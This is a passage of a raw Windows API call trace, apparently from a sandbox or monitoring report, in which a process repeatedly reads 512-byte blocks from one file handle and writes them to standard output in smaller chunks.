lpOverlapped=0x0) returned 1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] GetFileType (hFile=0x50) returned 0x1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] GetFileType (hFile=0x50) returned 0x1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] GetFileType (hFile=0x50) returned 0x1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.834] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.834] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.834] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.834] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] GetFileType (hFile=0x50) returned 0x1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] GetFileType (hFile=0x50) returned 0x1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] GetFileType (hFile=0x50) returned 0x1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] GetFileType (hFile=0x50) returned 0x1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] GetFileType (hFile=0x50) returned 0x1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] GetFileType (hFile=0x50) returned 0x1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] GetFileType (hFile=0x50) returned 0x1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] GetFileType (hFile=0x50) returned 0x1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.835] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.835] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] GetFileType (hFile=0x50) returned 0x1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] GetFileType (hFile=0x50) returned 0x1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] GetFileType (hFile=0x50) returned 0x1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] GetFileType (hFile=0x50) returned 0x1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] GetFileType (hFile=0x50) returned 0x1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] GetFileType (hFile=0x50) returned 0x1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] GetFileType (hFile=0x50) returned 0x1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] GetFileType (hFile=0x50) returned 0x1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.837] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.837] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] GetFileType (hFile=0x50) returned 0x1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] GetFileType (hFile=0x50) returned 0x1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] GetFileType (hFile=0x50) returned 0x1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] GetFileType (hFile=0x50) returned 0x1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] GetFileType (hFile=0x50) returned 0x1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] GetFileType (hFile=0x50) returned 0x1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] GetFileType (hFile=0x50) returned 0x1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] GetFileType (hFile=0x50) returned 0x1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.838] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.838] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] GetFileType (hFile=0x50) returned 0x1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] GetFileType (hFile=0x50) returned 0x1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] GetFileType (hFile=0x50) returned 0x1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] GetFileType (hFile=0x50) returned 0x1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] GetFileType (hFile=0x50) returned 0x1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] GetFileType (hFile=0x50) returned 0x1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] GetFileType (hFile=0x50) returned 0x1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] GetFileType (hFile=0x50) returned 0x1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.839] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.839] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.839] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.839] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] GetFileType (hFile=0x50) returned 0x1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.841] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.841] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] GetFileType (hFile=0x50) returned 0x1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] GetFileType (hFile=0x50) returned 0x1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] GetFileType (hFile=0x50) returned 0x1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] GetFileType (hFile=0x50) returned 0x1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] GetFileType (hFile=0x50) returned 0x1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] GetFileType (hFile=0x50) returned 0x1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] GetFileType (hFile=0x50) returned 0x1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] GetFileType (hFile=0x50) returned 0x1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.842] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.842] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] GetFileType (hFile=0x50) returned 0x1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] GetFileType (hFile=0x50) returned 0x1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] GetFileType (hFile=0x50) returned 0x1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] GetFileType (hFile=0x50) returned 0x1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] GetFileType (hFile=0x50) returned 0x1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] GetFileType (hFile=0x50) returned 0x1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] GetFileType (hFile=0x50) returned 0x1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] GetFileType (hFile=0x50) returned 0x1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, 